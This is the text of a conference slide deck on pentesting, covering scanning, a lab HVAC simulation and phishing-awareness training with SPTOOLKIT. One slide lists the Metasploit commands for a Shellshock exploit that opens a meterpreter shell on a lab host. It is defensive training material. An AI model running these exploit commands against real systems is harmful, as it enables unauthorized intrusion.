ANATOMY OF A PENTEST:
PROACTIVE STEPS TO ADDRESS
VULNERABILITIES IN YOUR NETWORK
Presenter: Robbie Corley
Robbie.Corley@KCTCS.EDU
Organization: KCTCS
Senior Information Security Analyst
ABOUT ME
Personal Life / Interests
• Married
• Bachelor’s in Music Business???
• Favorite Show: Seinfeld
• Favorite Movie(s): Lord of the Rings / Hobbit Trilogy
• Favorite Aspects of IT Security:
• Reverse Engineering / Studying Shellcode
• Finding and Exploiting Software Vulnerabilties
LET’S TALK ABOUT PENTESTING
What is a pentest?
• A pentest is a simulated attack against a system to
prove or disprove the existence of vulnerabilities
previously detected by a vulnerability scan.
How does it work?
• You are the attacker:
• You will use exploits custom tailored to target
specific flagged vulnerabilities from your
previous vulnerability scan
LET’S TALK ABOUT PENTESTING
Some history on Pentesting…
• Pentesting originally required manually compiling each individual exploit
to test a vulnerability, all of which were usually coded in different
programming languages and specific to OS builds (XP sp1, XP sp2, etc)
What’s the advantage over a Vulnerability Scan and why conduct one?
• A Vulnerability Scan merely lays out the foundation for your
network risk assessment
• A Pentest helps you fortify your network by discovering and
patching security holes before the attackers do and keeps your
auditors happy, which also keeps your boss happy 
• Pentesting “weeds out” false positives from a Vulnerability Scan
while also validating vulnerabilities
CONDUCTING YOUR FIRST PENTEST
•
Our Goal: To Scan and Validate vulnerabilities in a simulated environment to
demonstrate the effectiveness of a Pentest
•
Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus)
•
Other recommendations: Tenable Nessus
•
Open Source: OpenVAS
•
Why Rapid7?
• Exploits are pre-compiled and you do not need to go online to search for them.
Readily available, built into the software
• Scanner and Pentesting software both free to try
•
Software Resources Used:
•
Nexpose Vulnerability Scan Solution
•
Metasploit Pentesting Solution
HVAC SYSTEM SCAN & PENTEST
SIMULATION
• Breakdown: Your boss has requested a blind vulnerability/pentest
assessment for your HVAC network
• Attack Vectors used: Client Side and Web
• A Blind Scan?
• A blind scan/pentest is when you scan/pentest a network without using
known credentials. This helps to mimic a realistic cyber attack scenario
•HVAC Network Layout:
• HVAC A: Windows XP for server HVAC software:
• 192.168.56.101
• HVAC B: Linux Web Server for HVAC Web Services
• 192.168.56.102
HVAC SERVER A: SCAN SIMULATION
Vulnerability Scan Results using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC
CONSOLE
SERVER
HVAC SERVER A: PENTEST SIMULATION
Pentest Live Demo using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC
CONSOLE
SERVER
HVAC SERVER B: SCAN SIMULATION
Vulnerability Scan Results using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC
WEB
SERVER
Shellshock!!!!!!
HVAC SERVER B: PENTEST SIMULATION
Pentest Live Demo using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC
WEB
SERVER
PENTEST SHELL COMMANDS USED
Commands used for future reference:
To pull up web console, type : Alt +Tilde “~”, then…
• “use exploit/multi/http/apache_mod_cgi_bash_env_exec”
• “set RHOST 192.168.56.102” (our victim box ip address)
• “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script)
• “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module)
• “run”
Once in the compromised victim’s machine session, you can open a
shell by simply typing “shell”. You will then be greeted with a linux shell

USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING MODULES
• Why have User Awareness Training?
• Users can be more mindful of simple operations that can effectively
help keep their documents and data safe
• We simply cannot monitor all of our users’ actions
• Hacker’s are keen on well structured network security, and seek out
easier pathways of entry, i.e.: A phishing email directed to an
unsuspecting, un-training user
• On a personal note: Training gives our users a boost of confidence,
knowing they are collectively making a difference in keeping themselves
and the company more secure
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING PHISHING MODULES
•
How does it work?
• Phishing Modules use pre-made email templates
that resemble common Phishing emails in the wild
• Emails can be tailored to re-direct users to
informative phishing awareness videos upon the
user interacting with a phishing email
•
What tools do I need?
• Easiest solution and what we will be using:
SPTOOLKIT
• SPTOOLKIT is Opensource and requires little
effort to setup
• Rapid7’s Metasploit Pentesting Software also
includes a Social Engineering module with a pro
license
USER AWARENESS TRAINING
PHISHING AROUND WITH SPTOOLKIT
•
Demo time!
• Link: https://github.com/sptoolkit/sptoolkit
• Requirements:
• SMTP server
• Any Linux OS box with Apache and
MySQL installed
•
Recommended approach: Install
Kali Linux which has Apache and
MySql installed and enabled by
default
• http://www.kali.org/downloads/
• Commands to start MYSQL and Apache:
• Service apache2 start
• Service mysql start
USER AWARENESS TRAINING
PHISHING AROUND WITH SPTOOLKIT
THAT’S ALL FOLKS
This presentation and its supplemental video and software content
can be downloaded by using the following link:
http://tinyurl.com/l46flvo (Secure Google-Drive repository)
Links to Resources outside of this repository:
SPTOOLKIT Setup Guide:
http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup
www.rapid7.com -> download Community edition of Metasploit and Nexpose
http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting
environment and for SPTOOLKIT Social Engineering Module
Want to chat with me outside of this conference about more IT Security topics?
Shoot me an email at:
Robbie.Corley@kctcs.edu
QUESTIONS???